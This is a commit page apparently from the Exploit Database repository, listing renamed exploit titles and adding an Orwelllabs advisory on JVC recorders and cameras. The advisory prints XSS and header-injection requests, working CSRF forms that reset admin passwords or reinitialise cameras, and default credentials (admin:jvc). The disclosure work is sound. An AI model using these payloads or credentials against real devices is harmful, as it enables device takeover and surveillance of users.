Linux Kernel <= 2.6.37 - Local Privilege Escalation (Full Nelson)
Linux Kernel <= 2.6.37 (Redhat / Ubuntu 10.04) - 'Full Nelson' Local Privilege Escalation

Habari Blog Multiple Vulnerabilities
Habari Blog - Multiple Vulnerabilities

Linux Kernel 2.6.34 - CAP_SYS_ADMIN x86 - Local Privilege Escalation Exploit
Linux Kernel < 2.6.34 (Ubuntu 10.10) - CAP_SYS_ADMIN x86 - Local Privilege Escalation Exploit (1)
F3Site 2011 alfa 1 - Multiple Vulnerabilities (XSS & CSRF)
phpMySport 1.4 - Multiple Vulnerabilities (SQLi & Auth Bypass & Path Disclosure)
F3Site 2011 alfa 1 - (XSS & CSRF) Multiple Vulnerabilities
phpMySport 1.4 - (SQLi & Auth Bypass & Path Disclosure) Multiple Vulnerabilities

Linux Kernel < 2.6.34 - CAP_SYS_ADMIN x86 & x64 - Local Privilege Escalation Exploit (2)
Linux Kernel < 2.6.34 CAP_SYS_ADMIN x86 & x64 (Ubuntu 110.10) - Local Privilege Escalation Exploit (2)

Comcast DOCSIS 3.0 Business Gateways Multiple Vulnerabilities
Comcast DOCSIS 3.0 Business Gateways - Multiple Vulnerabilities

T-Content Managment System Multiple Vulnerabilities
T-Content Managment System - Multiple Vulnerabilities

Samba _username map script_ Command Execution
Samba 'username map script' Command Execution

Adobe CoolType SING Table _uniqueName_ Stack Buffer Overflow
Adobe CoolType SING Table 'uniqueName' Stack Buffer Overflow

Microsoft Internet Explorer - _Aurora_ Memory Corruption
Microsoft Internet Explorer - 'Aurora' Memory Corruption

Adobe Flash Player _newfunction_ Invalid Pointer Use
Adobe Flash Player - 'newfunction' Invalid Pointer Use

Adobe CoolType SING Table _uniqueName_ Stack Buffer Overflow
Adobe CoolType SING Table 'uniqueName' Stack Buffer Overflow

Adobe Flash Player _Button_ Remote Code Execution
Adobe Flash Player - 'Button' Remote Code Execution

Adobe Flash Player _newfunction_ Invalid Pointer Use
Adobe Flash Player - 'newfunction' Invalid Pointer Use

Unreal Tournament 2004 - _secure_ Overflow (Win32)
Unreal Tournament 2004 - 'secure' Overflow (Windows)

Unreal Tournament 2004 - _secure_ Overflow (Linux)
Unreal Tournament 2004 - 'secure' Overflow (Linux)

Tugux CMS 1.0_final Multiple Vulnerabilities
Tugux CMS 1.0_final - Multiple Vulnerabilities

Honey Soft Web Solution Multiple Vulnerabilities
Honey Soft Web Solution - Multiple Vulnerabilities

Joomla JCE Component (com_jce) Blind SQL Injection Vulnerability
Joomla JCE Component (com_jce) - Blind SQL Injection Vulnerability

Parnian Opendata CMS SQL Injection Vulnerability
Parnian Opendata CMS - SQL Injection Vulnerability

Time and Expense Management System Multiple Vulnerabilities
Time and Expense Management System - Multiple Vulnerabilities

ZyWALL USG - Appliance Multiple Vulnerabilities
ZyWALL USG - Appliance - Multiple Vulnerabilities
Cisco Unified Operations Manager Multiple Vulnerabilities
Microsoft Windows Vista/Server 2008 - _nsiproxy.sys_ Local Kernel DoS Exploit
Cisco Unified Operations Manager - Multiple Vulnerabilities
Microsoft Windows Vista/Server 2008 - 'nsiproxy.sys' Local Kernel DoS Exploit

HP Data Protector Client EXEC_SETUP Remote Code Execution PoC (ZDI-11-056)
HP Data Protector Client 6.11 - EXEC_SETUP Remote Code Execution PoC (ZDI-11-056)

HP Data Protector Client EXEC_CMD Remote Code Execution PoC (ZDI-11-055)
HP Data Protector Client 6.11 - EXEC_CMD Remote Code Execution PoC (ZDI-11-055)

Mozilla Firefox - _nsTreeRange_ Dangling Pointer Exploit
Mozilla Firefox - 'nsTreeRange' Dangling Pointer Exploit

Ollance Member Login Script Multiple Vulnerabilities
Ollance Member Login Script - Multiple Vulnerabilities

Adobe Reader X Atom Type Confusion Vulnerability Exploit
Adobe Reader X 10.0.0 - 10.0.1 - Atom Type Confusion Vulnerability Exploit

Mozilla Firefox _nsTreeRange_ Dangling Pointer Vulnerability
Mozilla Firefox - 'nsTreeRange' Dangling Pointer Vulnerability

Tradingeye E-commerce Shopping Cart Multiple Vulnerabilities
Tradingeye E-commerce Shopping Cart - Multiple Vulnerabilities
CA ARCserve D2D r15 GWT RPC Multiple Vulnerabilities
Safari - SVG DOM Processing PoC
CA ARCserve D2D r15 GWT RPC - Multiple Vulnerabilities
Safari 5.0.6_ 5.1 - SVG DOM Processing PoC

Link Station Pro Multiple Vulnerabilities
Link Station Pro - Multiple Vulnerabilities

Cart Software Multiple Vulnerabilities
Cart Software - Multiple Vulnerabilities

Omnistar Mailer Multiple Vulnerabilities
Omnistar Mailer - Multiple Vulnerabilities

Linux Kernel - 'perf_count_sw_cpu_clock' event Denial of Service
Linux Kernel 3.0.0 - 'perf_count_sw_cpu_clock' event Denial of Service

Linux Kernel < 2.6.36.2 - Econet Privilege Escalation Exploit
Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - Econet Privilege Escalation Exploit

MYRE Real Estate Software Multiple Vulnerabilities
MYRE Real Estate Software - Multiple Vulnerabilities

Cisco TelePresence Multiple Vulnerabilities - SOS-11-010
Cisco TelePresence SOS-11-010 - Multiple Vulnerabilities

FreeBSD UIPC socket heap Overflow proof-of-concept
FreeBSD - UIPC socket heap Overflow Proof of Concept

GotoCode Online Bookstore Multiple Vulnerabilities
GotoCode Online Bookstore - Multiple Vulnerabilities

DivX Plus Web Player _file://_ Buffer Overflow Vulnerability PoC
DivX Plus Web Player - 'file://' Buffer Overflow Vulnerability PoC

EFront <= 3.6.9 Community Edition Multiple Vulnerabilities
EFront <= 3.6.9 Community Edition - Multiple Vulnerabilities

GotoCode Online Classifieds Multiple Vulnerabilities
GotoCode Online Classifieds - Multiple Vulnerabilities

6kbbs Multiple Vulnerabilities
6kbbs - Multiple Vulnerabilities

POSH Multiple Vulnerabilities
POSH - Multiple Vulnerabilities

NoNumber Framework Joomla! Plugin Multiple Vulnerabilities
NoNumber Framework Joomla! Plugin - Multiple Vulnerabilities

Uiga Personal Portal Multiple Vulnerabilities
Uiga Personal Portal - Multiple Vulnerabilities

Barter Sites 1.3 Joomla Component Multiple Vulnerabilities
Barter Sites 1.3 Joomla Component - Multiple Vulnerabilities

zFTP Server _cwd/stat_ Remote Denial-of-Service
zFTP Server - 'cwd/stat' Remote Denial-of-Service
JEEMA Sms 3.2 Joomla Component Multiple Vulnerabilities
Vik Real Estate 1.0 Joomla Component Multiple Vulnerabilities
JEEMA Sms 3.2 Joomla Component - Multiple Vulnerabilities
Vik Real Estate 1.0 Joomla Component - Multiple Vulnerabilities

ZTE ZXDSL 831IIV7.5.0a_Z29_OV Multiple Vulnerabilities
ZTE ZXDSL 831IIV7.5.0a_Z29_OV - Multiple Vulnerabilities

osCSS2 - __ID_ parameter Local file inclusion
osCSS2 - '_ID' parameter Local file inclusion

Infoproject Business Hero Multiple Vulnerabilities
Infoproject Business Hero - Multiple Vulnerabilities

SugarCRM CE <= 6.3.1 - _unserialize()_ PHP Code Execution
SugarCRM CE <= 6.3.1 - 'unserialize()' PHP Code Execution
ARYADAD Multiple Vulnerabilities
Linux Kernel 2.6.39 <= 3.2.2 (32-bit & 64-bit) - Mempodipper Local Root (1)
ARYADAD - Multiple Vulnerabilities
Linux Kernel 2.6.39 <= 3.2.2 (32-bit & 64-bit) (Gentoo / Ubuntu) - Mempodipper Local Root (1)

vBSEO <= 3.6.0 - _proc_deutf()_ Remote PHP Code Injection Exploit
vBSEO <= 3.6.0 - 'proc_deutf()' Remote PHP Code Injection Exploit

swDesk Multiple Vulnerabilities
swDesk - Multiple Vulnerabilities

Fork CMS 3.2.4 - Multiple Vulnerabilities (LFI/XSS)
Fork CMS 3.2.4 - (LFI/XSS) Multiple Vulnerabilities

DFLabs PTK <= 1.0.5 - Multiple Vulnerabilities (Steal Authentication Credentials)
DFLabs PTK <= 1.0.5 - (Steal Authentication Credentials) Multiple Vulnerabilities

HomeSeer HS2 and HomeSeer PRO Multiple Vulnerabilities
HomeSeer HS2 and HomeSeer PRO - Multiple Vulnerabilities

Adobe Flash Player .mp4 - 'cprt' Overflow_
Adobe Flash Player .mp4 - 'cprt' Overflow

Wolfcms <= 0.75 - Multiple Vulnerabilities (CSRF - XSS)
Wolfcms <= 0.75 - (CSRF/XSS) Multiple Vulnerabilities

Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow_
Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow'

MailMax <= 4.6 - POP3 - _USER_ Remote Buffer Overflow Exploit (No Login Needed)
MailMax <= 4.6 - POP3 - 'USER' Remote Buffer Overflow Exploit (No Login Needed)

Samsung D6000 TV Multiple Vulnerabilities
Samsung D6000 TV - Multiple Vulnerabilities

Websense Triton Multiple Vulnerabilities
Websense Triton - Multiple Vulnerabilities

QNX phrelay/phindows/phditto Multiple Vulnerabilities
QNX phrelay/phindows/phditto - Multiple Vulnerabilities

Lynx Message Server Multiple Vulnerabilities
Lynx Message Server - Multiple Vulnerabilities

SAP Netweaver Dispatcher Multiple Vulnerabilities
SAP Netweaver Dispatcher - Multiple Vulnerabilities

elearning server 4g Multiple Vulnerabilities
elearning server 4g - Multiple Vulnerabilities

Pro-face Pro-Server EX WinGP PC Runtime Multiple Vulnerabilities
Pro-face Pro-Server EX WinGP PC Runtime - Multiple Vulnerabilities

Axous 1.1.1 - Multiple Vulnerabilities (CSRF - Persistent XSS)
Axous 1.1.1 - (CSRF/Persistent XSS) Multiple Vulnerabilities

Active Collab _chat module_ <= 2.3.8 - Remote PHP Code Injection Exploit
Active Collab 'chat module' <= 2.3.8 - Remote PHP Code Injection Exploit

SunOS <= 4.1.3 kmem setgid /etc/crash Vulnerability
SunOS <= 4.1.3 - kmem setgid /etc/crash Vulnerability

Linux kernel 2.0/2.1 - SIGIO Vulnerability
Linux Kernel 2.0 / 2.1 - SIGIO Vulnerability

Digital UNIX <= 4.0 D_FreeBSD <= 2.2.4_HP HP-UX 10.20/11.0_IBM AIX <= 3.2.5_Linux kernel 2.0/2.1_NetBSD 1.2_Solaris <= 2.5.1 - Smurf Denial of Service Vulnerability
Linux Kernel 2.0/2.1_ Digital UNIX <= 4.0 D_ FreeBSD <= 2.2.4_ HP HP-UX 10.20/11.0_ IBM AIX <= 3.2.5_ NetBSD 1.2_ Solaris <= 2.5.1 - Smurf Denial of Service Vulnerability

Microsoft Windows - _April Fools 2001_ Vulnerability
Microsoft Windows - 'April Fools 2001' Vulnerability
Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 RAS Dial-up Networking _Save Password_ Vulnerability
Microsoft Windows NT <= 4.0 SP5_Terminal Server 4.0 - _Pass the Hash_ with Modified SMB Client Vulnerability
Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 - RAS Dial-up Networking 'Save Password' Vulnerability
Microsoft Windows NT <= 4.0 SP5_Terminal Server 4.0 - 'Pass the Hash' with Modified SMB Client Vulnerability

Linux Kernel 2.2/2.3 / Debian Linux 2.1 / RedHat Linux 6.0 / S.u.S.E. Linux 6.1 - IP Options Vulnerability

Linux kernel 2.0/2.1/2.2 - autofs Vulnerability
Linux Kernel 2.0 / 2.1 / 2.2 - autofs Vulnerability

QNAP Turbo NAS 3.6.1 Build 0302T Multiple Vulnerabilities
QNAP Turbo NAS 3.6.1 Build 0302T - Multiple Vulnerabilities
Linux kernel 2.0 - TCP Port DoS Vulnerability
Linux kernel 2.2 - ldd core Vulnerability
Linux Kernel 2.0 - TCP Port DoS Vulnerability
Linux Kernel 2.2 - ldd core Force Reboot Vulnerability

Linux kernel 2.0.33 - IP Fragment Overlap Vulnerability
Linux Kernel 2.0.33 - IP Fragment Overlap Vulnerability

Linux kernel 2.0/2.0.33 - i_count Overflow Vulnerability
Linux Kernel 2.0 / 2.0.33 - i_count Overflow Proof of Concept

IBM System Storage DS Storage Manager Profiler Multiple Vulnerabilities
IBM System Storage DS Storage Manager Profiler - Multiple Vulnerabilities

Linux kernel 2.0.37 - Segment Limit Vulnerability
Linux Kernel 2.0.37 - Segment Limit Local Root Vulnerability

BSD/OS <= 4.0_FreeBSD <= 3.2_Linux kernel <= 2.3_NetBSD <= 1.4 - Shared Memory Denial of Service Vulnerability
Linux Kernel <= 2.3_ BSD/OS <= 4.0_ FreeBSD <= 3.2_ NetBSD <= 1.4 - Shared Memory Denial of Service Vulnerability

Quinn _the Eskimo_ and Peter N. Lewis Internet Config 1.0/2.0 Weak Password Encryption Vulnerability
Quinn 'the Eskimo' and Peter N. Lewis Internet Config 1.0/2.0 Weak Password Encryption Vulnerability

Fujitsu Chocoa 1.0 beta7R _Topic_ Buffer Overflow Vulnerability
Fujitsu Chocoa 1.0 beta7R - 'Topic' Buffer Overflow Vulnerability

Linux kernel 2.0.30/2.0.35/2.0.36/2.0.37 - Blind TCP Spoofing Vulnerability
Linux Kernel 2.0.30/2.0.35/2.0.36/2.0.37 - Blind TCP Spoofing Vulnerability

Microsoft Internet Explorer 5.0 - ActiveX _Object for constructing type libraries for scriptlets_ Vulnerability
Microsoft Internet Explorer 5.0 - ActiveX 'Object for constructing type libraries for scriptlets' Vulnerability

Microsoft Internet Explorer 4.0/5.0 - ActiveX _Eyedog_ Vulnerability
Microsoft Internet Explorer 4.0/5.0 - ActiveX 'Eyedog' Vulnerability

Linux kernel 2.2 - Predictable TCP Initial Sequence Number Vulnerability
Linux Kernel 2.2 - Predictable TCP Initial Sequence Number Vulnerability

MediaHouse Software Statistics Server 4.28/5.1 -…

Loading branch information

Offensive Security committed May 11, 2016

1 parent 01664c6 commit 52e862d

files.csv

Large diffs are not rendered by default.

platforms/hardware/remote/38493.txt

This file was deleted.

platforms/hardware/remote/39315.pl

This file was deleted.

platforms/hardware/webapps/39798.txt

-Original file line number
+Diff line change
@@ -0,0 +1,335 @@
+                          | | |       |
+      _ \  _|\ \  \ / -_) | | |  _` |  _ \(_-<
+    \___/_|   \_/\_/\___|_|_|_|\__,_|_.__/___/
+    www.orwelllabs.com
+    security advisory
+          olsa-2016-04-01
+    * Adivisory Information
+    +++++++++++++++++++++++
+    (+) Title: JVC Multiple Products Multiple Vulnerabilities
+    (+) Vendor: JVC Professional Video
+    (+) Research and Advisory: Orwelllabs
+    (+) Adivisory URL:
+    http://www.orwelllabs.com/2016/04/jvc-multiple-products-multiple.html
+    (+) OLSA-ID: OLSA-2016-04-01
+    (+) Affected Products: JVC HDR VR-809/816, Network cameras VN-C*, VN-V*,
+    VN-X* with firmwares 1.03 and 2.03
+    (+) IoT Attack Surface: Device Administrative Interface
+    (+) Owasp IoTTop10: I1, I2
+    * Overview
+    ++++++++++
+    I1 - 1. Multiple Cross-site Scripting
+    I1 - 2. HTTP Header Injection
+    I1 - 3. Multiple Cross-site Request Forgery
+    I1 - 4. Cleartext sensitive data
+    I1 - 5. Weak Default Credentials/Known credentials
+    I2 - 6. Poorly Protected Credentials
+. Reflected Cross-site scripting
+    =================================
+    JVC Hard Disk Recorders are prone to XSS and HTTP Header Injection[2].
+    (+) Affected Products:
+    ----------------------
+    JVC VR-809 HDR
+    JVC VR-816 HDR
+    (+) Technical Details/PoCs
+    --------------------------
+    (+) URL Trigger:
+    http://xxx.xxx.xxx.xxx/api/param?video.input(01).comment&video.input(02).comment&video.input(03).comment&video.input(04).comment&video.input(05).comment&video.input(06).comment&video.input(07).comment&video.input(08).comment&video.input(09).comment
+    (+) Payload used [ *** XSS *** ]: <img src=a onerror=alert("0rwelll4bs")>
+    (+) affected script/path: /api/param?
+    (+) affected parameters (video.input.COMMENT):
+    + video.input(01).comment[ *** XSS *** ]
+    + video.input(02).comment[ *** XSS *** ]
+    + video.input(03).comment[ *** XSS *** ]
+    + video.input(04).comment[ *** XSS *** ]
+    + video.input(05).comment[ *** XSS *** ]
+    + video.input(06).comment[ *** XSS *** ]
+    + video.input(07).comment[ *** XSS *** ]
+    + video.input(08).comment[ *** XSS *** ]
+    + video.input(09).comment[ *** XSS *** ]
+    (+) affected parameters (video.input.STATUS):
+    + video.input(01).status[ *** XSS *** ]
+    + video.input(02).status[ *** XSS *** ]
+    + video.input(03).status[ *** XSS *** ]
+    + video.input(04).status[ *** XSS *** ]
+    + video.input(05).status[ *** XSS *** ]
+    + video.input(06).status[ *** XSS *** ]
+    + video.input(07).status[ *** XSS *** ]
+    + video.input(08).status[ *** XSS *** ]
+    + video.input(09).status[ *** XSS *** ]
+    (+) URL Trigger:
+    http://xxx.xxx.xxx.xxx/api/param?network.interface(01).dhcp.status[ *** XSS
+    ***]
+    (+) affected parameters:
+    + interface(01).dhcp.status[ *** XSS *** ]
+    * In fact the javascript can be triggered just requesting the '/api/param?'
+    directly with payload, like this:
+    (+) URL: http://xxx.xxx.xxx.xxx/api/param?[*** XSS *** ]
+. HTTP Header Injection
+    ========================
+    The value of the "video.input(X).comment/status" request parameter is
+    copied into the 'X-Response' response header.
+    So the malicious payload submitted in the parameter generates a response
+    with an injected HTTP header.
+    > If you request the following URL with an Javascript Payload "[*** XSS
+    ***]":
+    http://xxx.xxx.xxx.xxx/api/param?video.input(01).comment<img src=a
+    onerror=alert("XSS")>&video.input(02).comment&video.input(03).comment&video.input(04).comment&video.input(05).comment&video.input(06).comment&video.input(07).comment&video.input(08).comment&video.input(09).comment
+    > It will gennerate the GET request bellow:
+    GET /api/param?video.input(01).comment<img src=a
+    onerror=alert("XSS")>&video.input(02).comment&video.input(03).comment&video.input(04).comment&video.input(05).comment&video.input(06).comment&video.input(07).comment&video.input(08).comment&video.input(09).comment
+    HTTP/1.1
+    Host: xxx.xxx.xxx.xxx
+    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101
+    Firefox/45.0
+    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+    Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
+    Accept-Encoding: gzip, deflate
+    Referer: http://xxx.xxx.xxx.xxx/
+    Cookie: vrtypename=Hard%20Disk%20Recorder; vrmodelname=0rw3|||4bs
+    Authorization: Basic YWRtaW46anZj
+    Connection: keep-alive
+    > And we'll get the response from the server:
+    HTTP/1.1 200 OK
+    Connection: close
+    Content-Type: text/html; charset=utf-8
+    Content-Length: 564
+    X-Response: video.input(01).comment<img src=a
+    onerror=alert("XSS")>&video.input(02).comment&video.input(03).comment&video.input(04).comment&video.input(05).comment&video.input(06).comment&video.input(07).comment&video.input(08).comment&video.input(09).comment
+    Cache-control: no-cache
+    Pragma: no-cache
+    Expires: Thu, 05 May 2016 14:20:45 GMT
+    Server: JVC VR-809/816 API Server/1.0.0
+    Date: Thu, 05 May 2016 14:20:45 GMT
+    The javascript payload will be inject in X-Response response Header field
+. Multiple Cross-site Request Forgery
+    ======================================
+    Multiple products from JVC are prone to CSRF.
+    (+) Affected Products:
+    ----------------------
+    The following products with firmware versions 1.03, 2.03 and early:
+    VN-C2WU
+    VN-C3U
+    VN-C1U
+    VN-C2U
+    VN-C3WU
+    VN-A1U
+    VN-C10U
+    VN-C11U
+    VN-C655U
+    VN-C625U
+    VN-C205U
+    VN-C215V4U
+    VN-C215VP4U
+    VN-V686U
+    VN-V686WPU
+    VN-V25U
+    VN-V26U
+    VN-X35U
+    VN-V685U
+    VN-V686WPBU
+    VN-X235VPU
+    VN-V225VPU
+    VN-X235U
+    VN-V225U
+    VN-V17U
+    VN-V217U
+    VN-V217VPU
+    VN-H157WPU
+    VN-T16U
+    VN-T216VPRU
+    (+) Technical Details/PoCs
+    --------------------------
+    > CSRF: to change 'admin' password to 'sm!thW'
+    <html>
+     <!-- Orwelllabs - JVC NetCams CSRF PoC -->
+      <body>
+        <form action="http://xxx.xxx.xxx.xxx/cgi-bin/c20setup.cgi"
+    method="POST">
+          <input type="hidden" name="c20loadhtml"
+    value="c20systempassword&#46;html" />
+          <input type="hidden" name="usermode" value="admin" />
+          <input type="hidden" name="newpassword" value="sm!thW" />
+          <input type="hidden" name="new2password" value="sm!thW" />
+          <input type="hidden" name="ok" value="OK" />
+          <input type="submit" value="Submit form" />
+        </form>
+      </body>
+    </html>
+    > CSRF: to set 'user' password to "w!nst0nSm!th"
+    <html>
+     <!-- Orwelllabs - JVC NetCams CSRF PoC -->
+      <body>
+        <form action="http://xxx.xxx.xxx.xxx/cgi-bin/c20setup.cgi"
+    method="POST">
+          <input type="hidden" name="c20loadhtml"
+    value="c20systempassword&#46;html" />
+          <input type="hidden" name="usermode" value="user" />
+          <input type="hidden" name="newpassword" value="w!nst0nSm!th" />
+          <input type="hidden" name="new2password" value="w!nst0nSm!th" />
+          <input type="hidden" name="ok" value="OK" />
+          <input type="submit" value="Submit form" />
+        </form>
+      </body>
+    </html>
+    > CSRF: to reinitialize the cam
+    <html>
+      <!-- Orwelllabs - JVC NetCams CSRF PoC -->
+      <body>
+        <form action="http://xxx.xxx.xxx.xxx/cgi-bin/c20setup.cgi"
+    method="POST">
+          <input type="hidden" name="c20loadhtml"
+    value="c20systemmainte&#46;html" />
+          <input type="hidden" name="init" value="Initialize" />
+          <input type="submit" value="Submit form" />
+        </form>
+      </body>
+    </html>
+. Cleartext sensitive data
+    ===========================
+    By default everything is trasmite over HTTP, including credentials.
+. Weak Default Credentials/Known credentials
+    =============================================
+    The vast maiority of these devices remain with default credential admin:jvc
+    or admin:[model-of-camera] and costumers are not obligated to change it
+    during initial setup.
+. Poorly Protected Credentials
+    ===============================
+    An attacker in the same network is able to capture and decode the
+    credentials as they aren't trasmited over HTTPs and are protected using
+    just
+    Base64 with Basic Authorization.
+    > Authentication process
+    GET /cgi-bin/x35viewing.cgi?x35ptzviewer.html HTTP/1.1
+    Host: xxx.xxx.xxx.xxx
+    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101
+    Firefox/45.0
+    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+    Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
+    Accept-Encoding: gzip, deflate
+    Cookie: X35JPEGVIEWSIZE=VGA; X35JPEGDISP=OFF-OFF-OFF-OFF-1;
+    X35JPEGSTREAM=HTTP-5-225.0.1.1-49152; X35JPEGHTTPPORT=80;
+    X35FOLDERNAME=VN-X35; X35MPEG4VIEWSIZE=VGA; X35MPEG4DISP=OFF-OFF-OFF-1;
+    X35MPEG4STREAM=HTTP-225.0.2.1-59152; X35MPEG4HTTPPORT=80;
+    X35AUDIO=OFF-HTTP-225.0.3.1-39152-49298-80; X35PTZCTRL=w!nst0nSm!th
+    Connection: keep-alive
+    Authorization: Basic YWRtaW46anZj
+    *Once this is related with a old bad design is possible that a large range
+    of products are affected by reported issues.
+    Timeline
+    ++++++++
+-04-20: First attemp to contact Vendor
+-04-22: Vendor asks for products affected/details sent
+-04-26: Ask vendor for any news about the issues reported
+-05-09: Until this date no response
+-05-10: Full disclosure
+    Legal Notices
+    +++++++++++++
+    The information contained within this advisory and in any other published
+    by our lab is supplied "as-is" with no warranties or guarantees of fitness
+    of use or otherwise.
+    I accept no responsibility for any damage caused by the use or misuse of
+    this information.
+    About Orwelllabs
+    ++++++++++++++++
+    Orwelllabs is an independent security research lab interested in IoT, what
+    means embedded devices and all its components like web applications,
+    network, mobile applications and all surface areas prone to attack.
+    Orwelllabs aims to study, learn and produce some intelligence around this
+    vast and confusing big picture called smart cities. We have special
+    appreciation for devices designed to provide security to these highly
+    technological cities, also known as Iost (Internet of Security Things ).
+    -----BEGIN PGP PUBLIC KEY BLOCK-----
+    mQENBFcJl8wBCAC/J8rAQdOoC82gik6LVbH674HnxAAQ6rBdELkyR2S2g1zMIAFt
+    xNN//A3bUWwFtlrfgiJkiOC86FimPus5O/c4iZc8klm07hxWuzoLPzBPM50+uGKH
+    xZwwLa5PLuuR1T0O+OFqd9sdltz6djaYrFsdq6DZHVrp31P7LqHHRVwN8vzqWmSf
+hDGNTrjbnmfuAgQDrjA6FA2i6AWSTXEuDd5NjCN8jCorCczDeLXTY5HuJDb2GY
+    U9H5kjbgX/n3/UvQpUOEQ5JgW1QoqidP8ZwsMcK5pCtr9Ocm+MWEN2tuRcQq3y5I
+    SRuBk/FPhVVnx5ZrLveClCgefYdqqHi9owUTABEBAAG0IU9yd2VsbExhYnMgPG9y
+    d2VsbGxhYnNAZ21haWwuY29tPokBOQQTAQgAIwUCVwmXzAIbAwcLCQgHAwIBBhUI
+    AgkKCwQWAgMBAh4BAheAAAoJELs081R5pszAhGoIALxa6tCCUoQeksHfR5ixEHhA
+    Zrx+i3ZopI2ZqQyxKwbnqXP87lagjSaZUk4/NkB/rWMe5ed4bHLROf0PAOYAQstE
+    f5Nx2tjK7uKOw+SrnnFP08MGBQqJDu8rFmfjBsX2nIo2BgowfFC5XfDl+41cMy9n
+    pVVK9qHDp9aBSd3gMc90nalSQTI/QwZ6ywvg+5/mG2iidSsePlfg5d+BzQoc6SpW
+    LUTJY0RBS0Gsg88XihT58wnX3KhucxVx9RnhainuhH23tPdfPkuEDQqEM/hTVlmN
+rV1waD4+86IWG3Zvx79kbBnctD/e9KGvaeB47mvNPJ3L3r1/tT3AQE+Vv1q965
+    AQ0EVwmXzAEIAKgsUvquy3q8gZ6/t6J+VR7ed8QxZ7z7LauHvqajpipFV83PnVWf
+    ulaAIazUyy1XWn80bVnQ227fOJj5VqscfnHqBvXnYNjGLCNMRix5kjD/gJ/0pm0U
+    gqcrowSUFSJNTGk5b7Axdpz4ZyZFzXc33R4Wvkg/SAvLleU40S2wayCX+QpwxlMm
+    tnBExzgetRyNN5XENATfr87CSuAaS/CGfpV5reSoX1uOkALaQjjM2ADkuUWDp6KK
+L90h8vFLUCs+++ITWU9TA1FZxqTl6n/OnyC0ufUmvI4hIuQV3nxwFnBj1Q/sxHc
+    TbVSFcGqz2U8W9ka3sFuTQrkPIycfoOAbg0AEQEAAYkBHwQYAQgACQUCVwmXzAIb
+    DAAKCRC7NPNUeabMwLE8B/91F99flUVEpHdvy632H6lt2WTrtPl4ELUy04jsKC30
+    MDnsfEjXDYMk1GCqmXwJnztwEnTP17YO8N7/EY4xTgpQxUwjlpah++51JfXO58Sf
+    Os5lBcar8e82m1u7NaCN2EKGNEaNC1EbgUw78ylHU3B0Bb/frKQCEd60/Bkv0h4q
+    FoPujMQr0anKWJCz5NILOShdeOWXIjBWxikhXFOUgsUBYgJjCh2b9SqwQ2UXjFsU
+    I0gn7SsgP0uDV7spWv/ef90JYPpAQ4/tEK6ew8yYTJ/omudsGLt4vl565ArKcGwB
+    C0O2PBppCrHnjzck1xxVdHZFyIgWiiAmRyV83CiOfg37
+    =IZYl
+    -----END PGP PUBLIC KEY BLOCK-----

platforms/linux/dos/15344.c

-Original file line number
+Diff line change
@@ -1,4 +1,4 @@
-    //source: http://www.securityfocus.com/bid/44242/info
+    // source: http://www.securityfocus.com/bid/44242/info
     /*
      * CVE-2010-2963
      * Arbitrary write memory write via v4l1 compat ioctl.
@@ Expand Down @@

platforms/linux/dos/15619.c

-Original file line number
+Diff line change
@@ -1,4 +1,4 @@
-    //source: http://www.securityfocus.com/bid/44301/info
+    // source: http://www.securityfocus.com/bid/44301/info
     /* known for over a year, fixed in grsec
        bug is due to a bad limit on the max size of the stack for 32bit apps
        on a 64bit OS.   Instead of them being limited to 1/4th of a 32bit
@@ Expand Down @@

0 comments on commit `52e862d`

Please sign in to comment.

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Commit

There are no files selected for viewing

0 comments on commit `52e862d`

Commit

There are no files selected for viewing

0 comments on commit 52e862d

0 comments on commit `52e862d`